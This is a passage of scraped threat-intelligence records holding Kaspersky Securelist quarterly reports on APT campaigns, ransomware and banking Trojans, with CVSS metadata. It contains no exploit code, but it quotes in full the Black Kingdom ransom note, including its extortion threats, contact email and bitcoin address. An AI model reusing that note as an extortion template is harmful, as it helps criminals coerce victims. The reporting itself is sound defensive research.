contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n### Operation TunnelSnake\n\nWindows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.\n\nNevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.\n\nOne such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed "Moriya", was used to deploy passive backdoors on public facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png>)\n\nThis tool was used as part of an ongoing campaign that we named "[TunnelSnake](<https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/>)". The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.\n\nSince neither the rootkit nor other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker's infrastructure. However, the bulk of the detected tools besides Moriya, consist of both proprietary and well-known pieces of malware that were previously in use by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\n### PuzzleMaker\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.\n\nWhile we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.\n\nOn April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.\n\nThe exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor, which in turns connects to the C2 to get commands.\n\nWe weren't able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\n### Andariel adds ransomware to its toolset\n\nIn April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01-1024x272.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01.png>)\n\nDuring the course of our research, Malwarebytes published a [report](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/>) with technical details about the same series of attacks, which attributed it to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.\n\nHistorically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08-1024x629.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08.png>)\n\nWe also found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.\n\nNotably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlying the financial motivation of this threat actor.\n\n### Ferocious Kitten\n\n[Ferocious Kitten](<https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/>) is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to [researchers on Twitter](<https://twitter.com/reddrip7/status/1366703445990723585?s=21>). Since then, one of its implants [has been analyzed](<http://www.hackdig.com/03/hack-293629.htm>) by a Chinese threat intelligence firm.\n\nWe were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed "MarkiRAT", records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.\n\nFerocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren't reported very often; and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.\n\n## Other malware\n\n### Evolution of JSWorm ransomware\n\nWhile ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as [WannaCry](<https://securelist.com/wannacry-faq-what-you-need-to-know-today/78411/>) and [NotPetya](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>). Many ransomware gangs have switched to the more profitable tactic of "big-game hunting"; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there's now a [well-developed eco-system underpinning ransomware attacks](<https://securelist.com/ransomware-world-in-2021/102169/>).\n\nAs a result, even though [the number of ransomware attacks has fallen](<https://securelist.com/ransomware-by-the-numbers-reassessing-the-threats-global-impact/101965/>), and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.\n\nWe recently published analysis of one such ransomware family, named [JSWorm](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01-1024x341.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01.png>)\n\nEach "re-branded" version has included alterations to different aspects of the code \u2013 file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.\n\n### Black Kingdom ransomware\n\n[Black Kingdom](<https://securelist.com/black-kingdom-ransomware/102873/>) first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka [ProxyLogon](<https://proxylogon.com/>)). This ransomware family is much less sophisticated than other [Ransomware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/ransomware-as-a-service-raas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RaaS) or big game hunting families. The group's involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.\n\nThe malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a [script to recover files encrypted with the embedded key](<https://blog.cyberint.com/black-kingdom-ransomware>).\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nAfter decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>). The group adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key. We were not able to attribute Black Kingdom to any known threat group.\n\nBased on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.\n\n### Gootkit: the cautious banking Trojan\n\n[Gootkit](<https://securelist.com/gootkit-the-cautious-trojan/102731/>) belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it's not very common, new versions of the Trojan may remain under the researchers' radar for long periods.\n\nIt is complex multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploits kits such as Spelevo and RIG. In conjunction with spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.\n\nGootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan's loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.\n\nIn 2019, Gootkit stopped operating after it experienced a [data leak](<https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/>), but has been [active again](<https://www.bleepingcomputer.com/news/security/gootkit-malware-returns-to-life-alongside-revil-ransomware/>) since November 2020. Most of the victims are located in EU countries such as Germany and Italy.\n\n### Bizarro banking Trojan expands into Europe\n\nBizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy. This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png>)\n\nAs with [Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.\n\nBizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages and seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12-1024x762.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12.png>)\n\nBizarro is one of several banking Trojans from South America that have extended their operations into other regions \u2013 mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families-1024x1024.jpeg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families.jpeg>)\n\n### Malicious code in APKPure app\n\nIn early April, we [discovered malicious code in version 3.17.18 of the official client of the APKPure app store](<https://securelist.com/apkpure-android-app-store-infected/101845/>), a popular alternative source of Android apps. [The incident seems to be similar to what happened with CamScanner](<https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/>), when the app's developer implemented an adware SDK from an unverified source.\n\nWhen launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the [Triada Trojan](<https://www.kaspersky.com/blog/triada-trojan/11481/>). If the device is older (Android 6 or 7, and without security updates installed) it could be the [xHelper Trojan](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).\n\nWe reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.\n\n### Browser lockers\n\nBrowser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The "locking" consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.\n\nThis type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide. The tricks used by the scammers include imitating the infamous "[Blue Screen of Death](<https://encyclopedia.kaspersky.com/glossary/blue-screen-of-death-bsod/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)" (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.\n\nIn our [report on browser lockers](<https://securelist.com/browser-lockers-extortion-disguised-as-a-fine/101735/>), we examined two families of lockers that mimic government websites.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-1024x952.jpeg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-scaled.jpeg>)\n\nBoth families spread mainly via advertising networks, primarily aimed at selling "adult" content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).\n\nThese threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don't fall for the cybercriminals' smoke-and-mirror tactics.\n\n### Malware targets Apple M1 chip\n\nLast November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture. Unfortunately, just months after the release, [malware writers had already adapted several malware families to the new processor](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\n### Attempted supply-chain attack using PHP\n\nIn March, [unknown attackers tried to carry out a supply-chain attack by introducing malicious code to the PHP scripting language](<https://www.kaspersky.com/blog/php-git-backdor/39191/>). The developers of PHP make changes to the code using a common repository built on the GIT version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, in around 80 per cent of which (web servers) PHP is used.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:37", "type": "securelist", "title": "IT threat evolution Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2019-11510", "CVE-2021-1732", "CVE-2021-27065", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-08-12T10:00:37", "id": "SECURELIST:934E8AA177A27150B87EC15F920BF350", "href": "https://securelist.com/it-threat-evolution-q2-2021/103597/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-24T16:20:40", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22101624/malware_SL_pic3-990x400.jpg)\n\n## Targeted attacks\n\n### MATA: Lazarus's multi-platform targeted malware framework\n\nThe more sophisticated threat actors are continually developing their TTPs (Tactics, Techniques and Procedures) and the toolsets they use to compromise the systems of their targets. However, malicious toolsets used to target multiple platforms are rare, because they required significant investment to develop and maintain them. In July, we reported the use of an advanced, multi-purpose malware framework developed by the Lazarus group.\n\nWe discovered the first artefacts relating to this framework, dubbed 'MATA' (the authors named their infrastructure 'MataNet') in April 2018. Since then, Lazarus has further developed MATA; and there are now versions for Windows, Linux and macOS operating systems.\n\nThe MATA framework consists of several components, including a loader, an orchestrator (which manages and coordinates the processes once a device is infected) a C&C server and various plugins.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08145951/sl_mata_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08145951/sl_mata_01.png>)\n\nLazarus has used MATA to infiltrate the networks of organizations around the world and steal data from customer databases; and, in at least one case, the group has used it to spread ransomware \u2013 you can read more about this in the next section. The victims have included software developers, Internet providers and e-commerce sites; and we detected traces of the group's activities in Poland, Germany, Turkey, Korea, Japan, and India.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150538/sl_mata_04.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150538/sl_mata_04.png>)\n\nYou can read more about MATA [here](<https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/>).\n\n### Lazarus on the hunt for big game\n\nTargeted ransomware has been on the increase in recent years. Typically, such attacks are carried out by criminal groups, who license 'as-a-service' ransomware from third-party malware developers and then distribute it by piggy-backing established botnets.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08160419/sl_lazarus_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08160419/sl_lazarus_01.png>)\n\nHowever, earlier this year we discovered a new ransomware family linked to the Lazarus APT group. The [VHD ransomware](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>) operates much like other ransomware \u2013 it encrypts files on drives connected to the victim's computer and deletes System Volume Information (used as part of the Windows restore point feature) to prevent recovery of data. The malware also suspends processes that could potentially lock important files, such as Microsoft Exchange or SQL Server. However, the delivery mechanism is more reminiscent of APT campaigns. The spreading utility contains a list of administrative credentials and IP addresses specific to the victim, which is uses to brute-force the SMB service on every discovered computer. Whenever it makes a successful connection, a network share is mounted and the VHD ransomware is copied and executed through WMI calls.\n\nWhile investigating a second incident, we were able to uncover the full infection chain. The malware gained access to a victim's system by exploiting a vulnerable VPN gateway and then obtained administrative rights on the compromised machines. It used these to install a backdoor and take control of the Active Directory server. Then all computers were infected with the VHD ransomware using a loader created specifically for this task.\n\nFurther analysis revealed the backdoor to be part of the MATA framework described above.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08160730/sl_lazarus_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08160730/sl_lazarus_03.png>)\n\n### WastedLocker\n\n[Garmin, the GPS and aviation specialist, was the victim of a cyber-attack](<https://www.garmin.com/en-US/outage/>) in July that resulted in the encryption of some of its systems. The malware used in the attack was the WastedLocker and you can read our technical analysis of this ransomware [here](<https://securelist.com/wastedlocker-technical-analysis/97944/>).\n\nThis ransomware, the use of which has increased this year, has several noteworthy features. It includes a command line interface that attackers can use to control the way it operates \u2013 specifying directories to target and setting a priority of which files to encrypt first; and controlling the encryption of files on specified network resources. WastedLocker also features a bypass for UAC (User Account Control) on Windows computers that allows the malware to silently elevate its privileges using a known bypass technique.\n\nWastedLocker uses a combination of AES and RSA algorithms to encrypt files, which is a standard for ransomware families. Files are encrypted using a single public RSA key. This would be a weakness if this ransomware were to be distributed in mass attacks, since a decryptor from one victim would have to contain the only private RSA key that could be used to decrypt the files of all victims. However, since WastedLocker is used in attacks targeted at a specific organization, this decryption approach is worthless in real-world scenarios. Encrypted files are given the extension garminwasted_info, \u2013 and unusually, a new info file is created for each of the victim's encrypted files.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/31084831/sl_WastedLocker_04.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/31084831/sl_WastedLocker_04.png>)\n\n### CactusPete's updated Bisonal backdoor\n\nCactusPete is a Chinese-speaking APT threat actor that has been active since 2013. The group has typically targeted military, diplomatic and infrastructure victims in Japan, South Korea, Taiwan and the U.S. However, more recently the group has shifted its focus more towards other Asian and Eastern European organizations.\n\nThis group, which we would characterize as having medium level technical capabilities, seems to have acquired greater support and has access to more complex code such as ShadowPad, which CactusPete deployed earlier this year against government, defence, energy, mining and telecoms organizations.\n\nNevertheless, the group continues to use less sophisticated tools. We recently reported the group's use of a [new variant of the Bisonal backdoor](<https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/>) to steal information, execute code on target computers and perform lateral movement within the network. Our research began with a single sample, but using the [Kaspersky Threat Attribution Engine](<https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool>) (KTAE) we discovered more than 300 almost identical samples. All of these appeared between March 2019 and April this year \u2013 so the group has developed more than 20 samples per month! Bisonal is not advanced, relying instead on social engineering in the form of spear-phishing e-mails.\n\n### Operation PowerFall\n\nEarlier this year our technologies prevented an attack on a South Korean company. Our investigation uncovered two zero-day vulnerabilities: a remote code execution exploit for Internet Explorer and an elevation of privilege exploit for Windows. The exploits targeted the latest builds of Windows 10 and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build [18363](<https://docs.microsoft.com/en-us/windows/release-information/>) x64.\n\nThe exploits operated in tandem. The victim was first targeted with a malicious script that, because of the vulnerability, was able to run in Internet Explorer. Then a flaw in the system service further escalated the privileges of the malicious process. As a result, the attackers were able to move laterally across the target network.\n\nWe reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for the elevation of privilege vulnerability (CVE-2020-0986): although, before our discovery, Microsoft hadn't considered exploitation of this vulnerability to be likely. The patch for this vulnerability was released on 9 June. The patch for the remote code vulnerability (CVE-2020-1380) was released on 11 August.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/12070837/CVE-2020-1380_list.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/12070837/CVE-2020-1380_list.png>)\n\nWe named this malicious campaign Operation PowerFall. While we have been unable to find a clear link to known threat actors, we believe that DarkHotel might be behind it. You can read more about it [here](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>) and [here](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>).\n\n### The latest activities of Transparent Tribe\n\nTransparent Tribe, a prolific threat actor that has been active since at least 2013, specializes in cyber-espionage. The group's main malware is a custom .NET Remote Access Trojan (RAT) called Crimson RAT, spread by means of spear-phishing e-mails containing malicious Microsoft Office documents.\n\nDuring [our investigation into the activities of Transparent Tribe](<https://securelist.com/transparent-tribe-part-1/98127/>), we found around 200 Crimson RAT samples. Kaspersky Security Network (KSN) telemetry indicates that there were more than a thousand victims in the year following June 2019. The main targets were diplomatic and military organizations in India and Pakistan.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/19105713/sl_transparent_tribe_20.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/19105713/sl_transparent_tribe_20.png>)\n\nCrimson RAT includes a range of functions for harvesting data from infected computers. The latest additions include a server-side component used to manage infected client machines and a USB worm component developed for stealing files from removable drives, spreading across systems by infecting removable media and downloading and executing a thin-client version of Crimson RAT from a remote server.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/19101103/sl_transparent_tribe_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/19101103/sl_transparent_tribe_01.png>)\n\nWe also discovered a [new Android implant used by Transparent Tribe](<https://securelist.com/transparent-tribe-part-2/98233/>) to spy on mobile devices. The threat actor used social engineering to distribute the malware, disguised as a fake porn video player and a fake version of the Aarogya Setu COVID-19 tracking app developed by the government of India.\n\nThe app is a modified version of the AhMyth Android RAT, open source malware, downloadable from GitHub and built by binding a malicious payload inside legitimate apps. The malware is designed to collect information from the victim's device and send it to the attackers.\n\n### DeathStalker: mercenary cybercrime group\n\nIn August, we reported the activities of a cybercrime group that specializes in stealing trade secrets \u2013 mainly from fintech companies, law firms, and financial advisors, although we've also seen an attack on a diplomatic entity. The choice of targets suggests that this group, which we have named DeathStalker, is either looking for specific information to sell, or is a mercenary group offering an 'attack on demand' service. The group has been active since at least 2018; but it's possible that the group's activities could go back further, to 2012, and may be linked to the Janicab and Evilnum malware families.\n\nWe have seen Powersing-related activities in Argentina, China, Cyprus, Israel, Lebanon, Switzerland, Taiwan, Turkey, the UK and the UAE. We also located Evilnum victims in Cyprus, India, Lebanon, Russia, Jordan and the UAE.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/25072903/Map_Powersing_Evilnum_upd.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/25072903/Map_Powersing_Evilnum_upd.png>)\n\nThe group's use of a PowerShell implant called Powersing first brought DeathStalker to our attention. The operation starts with spear-phishing e-mails with attached archives containing a malicious LNK file. If the victim clicks on the archive, it starts a convoluted sequence resulting in the execution of arbitrary code on the computer\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/21145157/sl_decepticons_deathstalker_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/21145157/sl_decepticons_deathstalker_03.png>)\n\nPowersing periodically takes screenshots on the victim's computer and sends them to the C2 (Command and Control) server. It also executes additional PowerShell scripts that are downloaded from the C2 server. So Powersing is designed to provide the attackers with an initial point of presence on the infected computer from which to install additional malware.\n\nDeathStalker camouflages communication between infected computers and the C2 server by using public services as dead drop resolvers: these services allow the attackers to store data at a fixed URL through public posts, comments, user profiles, content descriptions, etc.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/21145258/sl_decepticons_deathstalker_04.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/21145258/sl_decepticons_deathstalker_04.png>)\n\nDeathStalker offers a good example of what small groups or even skilled individuals can achieve, without the need for innovative tricks or sophisticated methods. DeathStalker should serve as a baseline of what organizations in the private sector should be able to defend against, since groups of this sort represent the type of cyber-threat companies today are most likely to face. We advise defenders to pay close attention to any process creation related to native Windows interpreters for scripting languages, such as powershell.exe and cscript.exe: wherever possible, these utilities should be made unavailable. Security awareness training and security product assessments should also include infection chains based on LNK files.\n\nYou can read more about [DeathStalkers](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) here.\n\n## Other malware\n\n### The Tetrade: Brazilian banking malware goes global\n\nBrazil has a well-established criminal underground and local malware developers have created many banking Trojans over the years. Typically, this malware is used to target customers of local banks. However, Brazilian cybercriminals are starting to expand their attacks and operations abroad, targeting other countries and banks. [The Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>) is our designation for four large banking Trojan families that have been created, developed and spread by Brazilian criminals, but which are now being used at a global level. The four malware families are Guildma, Javali, Melcoz and Grandoreiro.\n\nWe have seen [attempts to do this before](<https://securelist.com/brazilian-trojans-beyond-borders/30879/>), with limited success using very basic Trojans. The situation is now different. Brazilian banking Trojans have evolved greatly, with hackers adopting techniques for bypassing detection, creating highly modular and obfuscated malware and using a very complex execution flow \u2013 making analysis more difficult. Notwithstanding the banking industry's adoption of technologies aimed at protecting customers, including the deployment of plugins, tokens, e-tokens, two-factor authentication, CHIP and PIN credit, fraud continues to increase because Brazil still lacks proper cybercrime legislation.\n\nBrazilian criminals are benefiting from the fact that many banks operating in Brazil also have operations elsewhere in Latin America and in Europe, making it easy to extend their attacks to customers of these financial institutions. They are also rapidly creating an ecosystem of affiliates, recruiting cybercriminals to work with in other countries, adopting MaaS (Malware-as-a-Service) and quickly adding new techniques to their malware as a way to keep it relevant and financially 